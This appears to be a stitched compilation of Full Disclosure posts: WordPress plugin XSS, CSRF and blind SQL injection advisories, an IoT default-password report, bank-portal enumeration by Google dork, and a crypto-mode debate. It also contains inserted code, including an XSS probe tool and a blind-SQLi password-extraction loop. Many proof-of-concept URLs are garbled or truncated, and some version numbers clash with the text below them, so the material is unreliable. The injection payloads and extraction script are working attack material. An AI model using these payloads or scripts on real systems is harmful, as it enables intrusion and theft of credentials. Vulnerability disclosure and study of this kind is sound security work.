Re: [FD] Anhui Huami Mi Fit Android Application - Unencrypted Update Check
What's the issue here exactly? An attacker can just prevent the in-app update check from realizing it needs to nag the user? The actual update logic and update-ability are controlled through the Play Store, no?

-Tim Strazzere

On Tue, Nov 26, 2019 at 10:27 AM David Coomber <davidcoomber.info...@gmail.com> wrote:

> Anhui Huami Mi Fit Android Application - Unencrypted Update Check
> --
> https://www.info-sec.ca/advisories/Huami-Mi-Fit.html
>
> Overview
>
> "Mi Fit tracks your activity, analyzes sleep, and evaluates your workouts."
>
> (https://play.google.com/store/apps/details?id=com.xiaomi.hm.health)
>
> Issue
>
> The Anhui Huami Mi Fit Android application (version 4.0.10 and below)
> does not encrypt the connection when it checks for an update.
>
> Impact
>
> An attacker who can monitor network traffic may be able to tamper with
> the application's update function.
>
> Timeline
>
> October 21, 2019 - Attempted to obtain a security contact via an email to supp...@amazfit.com
> October 22, 2019 - Provided the details to CERT/CC
> October 23, 2019 - CERT/CC opened a case for tracking
> November 4, 2019 - Attempted to obtain a security contact via an email to secur...@xiaomi.com
>
> Solution
>
> Upgrade to version 4.0.11 or later

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304]
[Author:] Tim Tepatti
[Website:] tepatti.com
[Title:] Hard-coded credentials on ProGrade/Lierda Grill Temperature Monitor [CVE-2019-15304]
[Product:] Grill Temperature Monitor
[Manufacturer:] ProGrade / Lierda
[Affected Version(s):] V1.00_50006
[Tested Version(s):] V1.00_50006
[Vulnerability Type:] Use of hard-coded credentials (CWE ID 798)
[CVE Reference:] CVE-2019-15304

[TL;DR:]
ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default password of admin for the admin account, which allows an attacker to cause a Denial of Service or Information Disclosure via the undocumented access-point configuration page located on the device.

[Long Info:]
ProGrade/Lierda Grill Temperature Monitor V1.00_50006 has a default password of admin for the admin account, which allows an attacker to cause a Denial of Service or Information Disclosure via the undocumented access-point configuration page located on the device. The access point configuration page is never made known to the end user: the user is never supposed to access it or change any of the options, and as such the end user has no idea that an attacker could access this page. This is different from a normal access point or internet router, where the administration page is required for setup and configuration and the end user is made aware of the risk of default credentials. This makes the vulnerability more severe, because the attack vector is something which the end user wasn't even aware operated on their device.

Additionally, two vendors are listed because Lierda is the wholesaler who actually created the device, and ProGrade simply re-branded the device for the American market. This way, both customers will be aware of the security vulnerabilities in the product.

[Technical Info:]
[Default Web Server IP:] 11.11.11.254
[Default Web Server Port:] 80
[Reference(s):] http://progradegrill.com/wifi-grilling-thermometer/
[FD] Multiple banks - potential risk of an inconsequent client separation
Hello all,

as many of you already know, some German banks share the same hoster. Via Google dorking it is possible to determine some customers of one of those hosters (Fiducia & GAD IT AG). The hoster uses a GET parameter called "bankid" to identify its customers. For example:

https://mobilebanking.gad.de/inm/mobilgadptlweb/WebPortal?bankid=8008

With the help of the Google dork "inurl:WebPortal?bankid=" it is possible to enumerate all banks which host their online banking service at Fiducia & GAD IT AG. We checked this via whois on the IP net ranges, where another mistake is made: the net name "GAD" appears in all whois records.

Another indicator for a shared environment (at least some shared systems) is changing the bank id, as shown in the following example:

https://www.apobank.de/ptlweb/WebPortal?bankid=8008

changed to:

https://www.apobank.de/ptlweb/WebPortal?bankid=8007

redirects to

https://www.vr.de/privatkunden.html

In Germany and the EU it is required by law that you separate client data, e.g. by the EU GDPR (DSGVO). For banks especially, BaFin audits this, too.

At the following link you'll find a cleaned list of the deduplicated dork results, where around 85 banks are listed with their bankid:

https://data.prosec-networks.com/d/7cf20ee4b17e44ccb402/?dl=1

In our opinion the separation is not done properly. What do you guys think about this?

Best regards / Mit freundlichen Grüßen

Tim Schughart
CEO / Geschäftsführer

--
ProSec GmbH
Robert-Koch-Straße 1-9
56751 Polch

Website: https://www.prosec-networks.com
Phone: +49 (0)261 450 930 90

Sitz der Gesellschaft / company domiciled in: Polch
Registergericht / registry court: Amtsgericht Koblenz, HRB 26457
Geschäftsführer / chief executive: Tim Schughart
USt-IdNr./ VAT ID: DE321817516

"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail."
[FD] YOP Poll 6.0.2 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [YOP Poll](https://wordpress.org/plugins/yop-poll/)
* Affected Version: 6.0.2
* Patched Version: 6.0.3
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 11/26/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The YOP Poll WordPress plugin is vulnerable to reflected XSS as it echoes the poll_id parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=yop-polls=view-votes_id=1'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/25/2018 Vendor responds, advisory sent
- 11/26/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-yop-poll-xss/

--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get=0x204DCBDD29BA0D89
[FD] WP Live Chat Support 8.0.17 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [WP Live Chat Support](https://wordpress.org/plugins/wp-live-chat-support/)
* Affected Version: 8.0.18
* Patched Version:
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/31/2018
* Vendor Fix: 11/01/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The WP Live Chat Support WordPress plugin is vulnerable to reflected XSS as it echoes the term parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=wplivechat-menu-gdpr-page='">

# Timeline

- 10/31/2018 Requested email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 11/01/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wp-livechat-xss/
[FD] wpGoogleMaps 7.10.41 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [wpGoogleMaps](https://wordpress.org/plugins/wp-google-maps/)
* Affected Version: 7.10.41
* Patched Version: 7.10.43
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 10/31/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The wpGoogleMaps WordPress plugin is vulnerable to reflected XSS as it echoes PHP_SELF without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php/'">?page=wp-google-maps-menu=foo

# Timeline

- 10/25/2018 Sent advisory
- 10/25/2018 Vendor confirms and releases fix
- 10/25/2018 Suggested improvement for fix
- 10/31/2018 Vendor releases improved fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-wpgooglemaps-xss/
[FD] NextScripts: Social Networks Auto-Poster 4.2.7 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [NextScripts: Social Networks Auto-Poster](https://wordpress.org/plugins/social-networks-auto-poster-facebook-twitter-g/)
* Affected Version: 4.2.7
* Patched Version: 4.2.8
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 11/02/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Social Networks Auto-Poster WordPress plugin is vulnerable to reflected XSS as it echoes the `item` parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=nxssnap-reposter=edit=24'">

# Timeline

- 10/25/2018 Requested email address via contact form
- 10/29/2018 Vendor supplies email address
- 10/31/2018 Advisory sent
- 11/02/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-social-networks-auto-poster-xss/
[FD] KingComposer 2.7.6 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [KingComposer](https://wordpress.org/plugins/kingcomposer/)
* Affected Version: 2.7.6
* Patched Version: none
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: none
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The KingComposer WordPress plugin is vulnerable to reflected XSS as it echoes the id parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=kc-mapper=<%2Fscript>
[FD] Give 2.3.0 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [Give](https://wordpress.org/plugins/give/)
* Affected Version: 2.3.0
* Patched Version: 2.3.1
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 11/24/2018
* Vendor Fix: 12/13/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Give WordPress plugin is vulnerable to reflected XSS as it echoes various parameters without proper encoding.

# Proof of Concept

http://localhost/wordpress/wp-admin/edit.php?post_type=give_forms=give-tools=import=import_donations=3%5B0%5D=email%5B1%5D=first_name%5B2%5D=amount%5B3%5D=form_id='">

# Timeline

- 11/24/2018 Asked for email address via contact form
- 11/24/2018 Vendor responds, advisory sent
- 12/13/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-give-xss/
[FD] Font_Organizer 2.1.1 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [Font_Organizer](https://wordpress.org/plugins/font-organizer/)
* Affected Version: 2.1.1
* Patched Version: none
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: none
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Font_Organizer WordPress plugin is vulnerable to reflected XSS as it echoes the manage_font_id parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/options-general.php?manage_font_id='">=font-setting-admin

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-font-organizer-xss/
[FD] Contact Form Email 7.10.41 - Reflected XSS & CSRF (WordPress Plugin)
* Vulnerability: XSS & CSRF
* Affected Software: [Contact Form Email](https://wordpress.org/plugins/contact-form-to-email/)
* Affected Version: 1.2.65
* Patched Version: 1.2.66
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/31/2018
* Vendor Fix: 10/31/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

## Reflected XSS

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Contact Form Email WordPress plugin is vulnerable to reflected XSS as it echoes the item parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1='">

# Code

contact-form-to-email/cp_admin_int_edition.inc.php

" />

## CSRF (to XSS)

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The plugin allows the addition of custom JavaScript to forms. Because the request to place this addition is not protected against CSRF, an attacker can place arbitrary JavaScript into the application if an authenticated user visits a webpage containing malicious HTML and/or JavaScript.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail=1=1=js; method="POST">

# Timeline

- 10/31/2018 Asked for email address via contact form
- 10/31/2018 Vendor responds, advisory sent
- 10/31/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-contact-form-email-xss-csrf/
[FD] Blog2Social 5.0.2 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [Blog2Social](https://wordpress.org/plugins/blog2social/)
* Affected Version: 5.0.2
* Patched Version: 5.0.3
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 11/13/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Blog2Social WordPress plugin is vulnerable to reflected XSS as it echoes the b2s_update_publish_date parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=blog2social-ship=70_action=1_update_publish_date='">

# Timeline

- 10/25/2018 Sent advisory
- 10/26/2018 Vendor confirms receipt of advisory
- 11/13/2018 Vendor releases fix
- 02/05/2019 Confirmed Fix & Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-blog2social-xss/
[FD] Quiz And Survey Master 6.0.4 - Reflected XSS (WordPress Plugin)
* Vulnerability: XSS
* Affected Software: [Quiz And Survey Master](https://wordpress.org/plugins/quiz-master-next/)
* Affected Version: 6.0.4
* Patched Version: none
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: none
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

# CVSS

6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

# Overview

The Quiz And Survey Master WordPress plugin is vulnerable to reflected XSS as it echoes the quiz_id parameter without proper encoding.

# Proof of Concept

http://192.168.0.103/wordpress/wp-admin/admin.php?page=mlw_quiz_results_id='">

# Timeline

- 10/25/2018 Sent advisory (no response)
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-quiz-and-survey-master-xss/
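The reflected XSS advisories above (YOP Poll through Quiz And Survey Master) all follow one pattern: a request parameter is echoed into a wp-admin page and the probe is `'">`. The following is an added example, not code from any of the plugins or from the advisories' author; it shows the check a tester runs to tell a raw reflection from an encoded one, next to a constructed stand-in for the vulnerable page, a half-fix that only escapes angle brackets, and the correct fix. The page markup, the `poll_id` attribute and the `zq9` markers are assumptions made for the demonstration.

```python
import html
import re
import urllib.request
from urllib.parse import quote

# Canary: the advisories' probe characters between markers unlikely to occur in a real page.
MARK = "zq9"
CANARY = MARK + "'\"><" + MARK


def reflection_kind(body: str, canary: str = CANARY) -> str:
    """Classify a reflection: 'raw', 'encoded', 'partial:<surviving chars>' or 'absent'."""
    if canary in body:
        return "raw"                     # unencoded: attribute breakout and tag injection both work
    m = re.search(re.escape(MARK) + r"(.*?)" + re.escape(MARK), body)
    if not m:
        return "absent"
    survivors = [c for c in "'\"<>" if c in m.group(1)]
    return "partial:" + "".join(survivors) if survivors else "encoded"


def _page(value: str) -> str:
    # Constructed stand-in for a plugin admin page that echoes a request parameter into an attribute.
    return f'<input type="hidden" name="poll_id" value="{value}">'


def render_vulnerable(value: str) -> str:
    return _page(value)                  # the bug class: raw echo of the request parameter


def render_half_fixed(value: str) -> str:
    # Escaping only angle brackets blocks <script> but the quote still closes the attribute.
    return _page(value.replace("<", "&lt;").replace(">", "&gt;"))


def render_fixed(value: str) -> str:
    # html.escape(quote=True) encodes & < > " ' the way WordPress's esc_attr() does.
    return _page(html.escape(value, quote=True))


def probe_url(base_url: str, param: str, canary: str = CANARY) -> str:
    sep = "&" if "?" in base_url else "?"
    return f"{base_url}{sep}{param}={quote(canary, safe='')}"


def probe_live(base_url: str, param: str, cookie: str = "") -> str:
    """Fetch the probe URL (wp-admin pages need a logged-in session cookie) and classify the result."""
    req = urllib.request.Request(probe_url(base_url, param), headers={"Cookie": cookie})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return reflection_kind(resp.read().decode("utf-8", "replace"))
```

The `partial` result is the one worth watching for when confirming a vendor fix: a page that strips `<` and `>` still lets `'"` close the attribute, which is enough for an event-handler injection.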
[FD] Forminator 1.5.4 - Unauthenticated Persistent XSS, Blind SQL Injection (WordPress Plugin)
* Vulnerability: Unauthenticated Persistent XSS, Blind SQL Injection
* Affected Software: [Forminator](https://wordpress.org/plugins/forminator/)
* Affected Version: 1.5.4
* Patched Version: 1.6
* CVE: not requested
* Risk: High
* Vendor Contacted: 11/25/2018
* Vendor Fix: 12/10/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen

## Unauthenticated Persistent XSS via poll

# CVSS

7.2 High
[CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)

# Details

Custom fields of a poll are not properly encoded when showing results of a poll, leading to persistent XSS.

# Proof of Concept

Prerequisite: create a poll, add a custom input field, publish the poll.

An attacker can place the payload - for example `'">` - in the custom input field. To trigger the payload, view the submissions of the poll.

## Authenticated Blind SQL Injection: Delete Submission

# CVSS

8.1 High
[CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H)

# Overview

The action of deleting submissions is vulnerable to blind SQL injection. An attacker can exploit this to extract data from the database. An account with the permission to delete submissions is required.

# Proof of Concept

- View submissions, e.g. at http://192.168.0.103/wordpress/wp-admin/admin.php?page=forminator-entries_type=forminator_forms_id=133
- Check the checkbox of one submission, use bulk action -> delete entries
- Apply the action and intercept or replay the request
- Change the `entry[]` value to contain an SQL payload, e.g.: 1) or sleep(5)--x-

# Timeline

- 11/25/2018 Asked for email address via contact form
- 11/25/2018 Vendor responds, advisory sent
- 12/10/2018 Vendor releases fix
- 02/05/2019 Disclosure

# Details & Full Advisory URL

https://security-consulting.icu/blog/2019/02/wordpress-forminator-persistent-xss-blind-sql-injection/
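The blind injection above lives in the `entry[]` values of the bulk-delete request, which the payload `1) or sleep(5)--x-` shows are concatenated into an `IN (...)` list. The following is an added example, not Forminator's code or the advisory author's: it rebuilds that bug class on an in-memory SQLite database with constructed sample rows, drives it as a boolean oracle (SQLite has no `sleep()`, so the signal is "did any rows get deleted" rather than response time; the injection point and the extraction loop are otherwise the same), and shows the fix next to it. The table and column names are assumptions; `absint()` and `$wpdb->prepare()` named in the comment are WordPress's real helpers for this.

```python
import sqlite3
import string

CHARSET = string.ascii_lowercase + string.digits


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the tables involved; the admin row is constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE entries (entry_id INTEGER PRIMARY KEY, form_id INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr');
    """)
    return db


def seed_entries(db: sqlite3.Connection, n: int = 3) -> None:
    db.execute("DELETE FROM entries")
    db.executemany("INSERT INTO entries VALUES (?, 133)", [(i,) for i in range(1, n + 1)])
    db.commit()


def vulnerable_delete(db: sqlite3.Connection, entry_values) -> int:
    """The bug class: entry[] values are concatenated straight into the IN list. Returns rows deleted."""
    sql = "DELETE FROM entries WHERE entry_id IN (%s)" % ",".join(entry_values)
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def safe_delete(db: sqlite3.Connection, entry_values) -> int:
    """Fix: cast every id to int and bind it (WordPress: absint() plus $wpdb->prepare())."""
    ids = [int(v) for v in entry_values]           # an injection payload raises ValueError here
    marks = ",".join("?" * len(ids))
    cur = db.execute(f"DELETE FROM entries WHERE entry_id IN ({marks})", ids)
    db.commit()
    return cur.rowcount


def blind_extract(db: sqlite3.Connection, length: int) -> str:
    """Boolean oracle: a correct guess makes the OR clause true and deletes every row; a wrong one deletes none."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            seed_entries(db)                       # restore rows so each probe is independent
            payload = (f"0) OR (SELECT substr(pass,{pos},1) FROM users "
                       f"WHERE login='admin')='{ch}' --")
            if vulnerable_delete(db, [payload]) > 0:
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    conn = setup_db()
    print("recovered via oracle:", blind_extract(conn, 4))
```

Each probe costs one request; with a time-based signal like the advisory's `sleep(5)` the loop is identical but waits on the response delay instead of counting rows.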
Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
Hi Erik,

Thanks for backing me up on a number of things. Only one response below.

> > In light of that, there's nothing particularly wrong with using CBC, if it is implemented well.
> > At least, using it is not *more* wrong than using OFB, CFB, or CTR
>
> That is wrong. CBC mode allows attacks such as "Sweet32"
> (https://sweet32.info/), which is not possible with CTR mode.

The site you linked mentions that 64-bit block ciphers are vulnerable, even in CTR mode. Obviously the birthday "paradox" applies. Regardless of how right or wrong you are about Sweet32, this is far from the most important thing *implementors* should be worried about. Obviously if they start with AES, then the birthday paradox issues are vastly reduced. Any new system should be avoiding the likes of 3DES, Blowfish, etc. So it seems moot.

On the flip side, tell me what the impact is of these two scenarios where a developer follows *some* of our advice:

(A) They use AES in CBC mode and apply an HMAC to the ciphertext. They actually validate that HMAC before decrypting. However, they fail to use a unique IV for every message.

(B) They use AES in CTR mode and apply an HMAC to the ciphertext. They actually validate that HMAC before decrypting. However, they fail to use a unique IV for every message.

Which is worse? Obviously (B) fails pretty catastrophically. (A) is not great, but at least the plaintext isn't nearly as easy to expose (usually only minor block-level information leaks).

In the real world I see these kinds of mistakes all of the time. So be careful of steering people toward a mode that doesn't degrade as gracefully when developers make mistakes. They invariably will do so, unless they've spent as much time with crypto as you and I.

tim

PS- And to re-iterate, we shouldn't ask them to use any particular cipher mode, but instead to use something off the shelf.
Re: [FD] [RT-SA-2016-001] Padding Oracle in Apache mod_session_crypto
> > res = apr_crypto_passphrase(, , passphrase,
> > strlen(passphrase), (unsigned char *) (), sizeof(apr_uuid_t),
> > *cipher, APR_MODE_CBC, 1, 4096, f, r->pool);
>
> CBC. Again.
>
> The earliest mention of CFB which I know is dated 1989.
> The earliest mention of CTR which I know is dated the 1990s.
>
> But there still are people who use CBC...
>
> Please, PLEASE, PPLAASSSE don't use it. Instead, use either
> Blowfish in CFB mode or at least Rijndael (AES) in CTR (or GCM)
> mode - both are available, for example, in the OpenSSL library.

All traditional modes that lack integrity protection are vulnerable to chosen-ciphertext attacks in these kinds of scenarios. CFB isn't immune and CTR is catastrophically weak. All traditional modes need a MAC or similar integrity protection.

In light of that, there's nothing particularly wrong with using CBC, if it is implemented well. At least, using it is not *more* wrong than using OFB, CFB, or CTR without integrity protection. GCM is fine if the implementation is sound and the IVs never repeat, but there are pitfalls.

We should instead be pointing developers in the direction of using something off-the-shelf, such as libsodium. Much less room for error.

tim
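Two points in this thread lend themselves to a concrete demonstration: the reply above, that any unauthenticated mode is open to chosen-ciphertext attacks and needs a MAC checked before decryption, and the (A)/(B) comparison in the follow-up, that CTR with a repeated IV fails far worse than CBC with a repeated IV. The block below is an added example, not code from the thread, from Apache or from mod_session_crypto. To run with only the standard library it uses a toy 128-bit Feistel cipher built on HMAC-SHA256 in place of AES (an assumption: the mode behaviour being shown does not depend on which block cipher sits underneath). It implements CBC and CTR on that cipher, measures what a repeated IV leaks in each, and wraps CBC in encrypt-then-MAC so that a tampered ciphertext is rejected before the padding check can act as an oracle.

```python
import hashlib
import hmac
import os

BLOCK = 16            # 128-bit blocks, as with AES
HALF = BLOCK // 2
ROUNDS = 8


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Feistel round function: keyed PRF (HMAC-SHA256) truncated to a half block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:HALF]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Toy 128-bit block cipher standing in for AES (assumption: any PRP serves the mode argument)."""
    left, right = block[:HALF], block[HALF:]
    for rnd in range(ROUNDS):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(ROUNDS)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")   # the oracle, if an attacker can reach it before a MAC check
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    padded, prev, out = pkcs7_pad(plaintext), iv, b""
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(padded[i:i + BLOCK], prev))   # chaining masks equal blocks
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    prev, out = iv, b""
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out += xor(block_decrypt(key, blk), prev)
        prev = blk
    return pkcs7_unpad(out)


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR: XOR with E(nonce || counter). The same function encrypts and decrypts."""
    out = b""
    for i in range(0, len(data), BLOCK):
        keystream = block_encrypt(key, nonce[:HALF] + (i // BLOCK).to_bytes(HALF, "big"))
        out += xor(data[i:i + BLOCK], keystream)
    return out


def ctr_nonce_reuse_leak(key: bytes, nonce: bytes, known_pt: bytes, secret_pt: bytes) -> bytes:
    """Scenario (B): nonce reused under CTR. c1 ^ c2 == p1 ^ p2, so one known plaintext exposes the other."""
    c1, c2 = ctr_crypt(key, nonce, known_pt), ctr_crypt(key, nonce, secret_pt)
    n = min(len(c1), len(c2))
    return xor(xor(c1[:n], c2[:n]), known_pt[:n])


def cbc_iv_reuse_leak(key: bytes, iv: bytes, known_pt: bytes, secret_pt: bytes) -> int:
    """Scenario (A): IV reused under CBC. All that leaks is how many leading blocks are equal."""
    c1, c2 = cbc_encrypt(key, iv, known_pt), cbc_encrypt(key, iv, secret_pt)
    equal = 0
    for i in range(0, min(len(c1), len(c2)), BLOCK):
        if c1[i:i + BLOCK] != c2[i:i + BLOCK]:
            break
        equal += 1
    return equal


def seal(enc_key: bytes, mac_key: bytes, plaintext: bytes, iv: bytes = None) -> bytes:
    """Encrypt-then-MAC over IV || ciphertext; a fresh random IV per message is the real fix for (A)."""
    iv = os.urandom(BLOCK) if iv is None else iv
    body = iv + cbc_encrypt(enc_key, iv, plaintext)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes) -> bytes:
    """Verify the tag first, so a forged ciphertext never reaches the padding check."""
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        raise ValueError("MAC check failed; ciphertext rejected before decryption")
    return cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:])
```

With two session tokens that share a 16-byte prefix, `ctr_nonce_reuse_leak` returns the second token in full from the first, while `cbc_iv_reuse_leak` returns only the count of matching leading blocks; that difference is the whole of the (A)-versus-(B) argument, and the tag check in `open_sealed` is what keeps `pkcs7_unpad` from ever answering an attacker.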
[FD] Ubiquiti
Hi,

Please let us communicate directly and not via mailing lists, because this results in flooding and is not important to all other people. If there is a final result, whether the PoC has a mistake or not, we can publish the result.

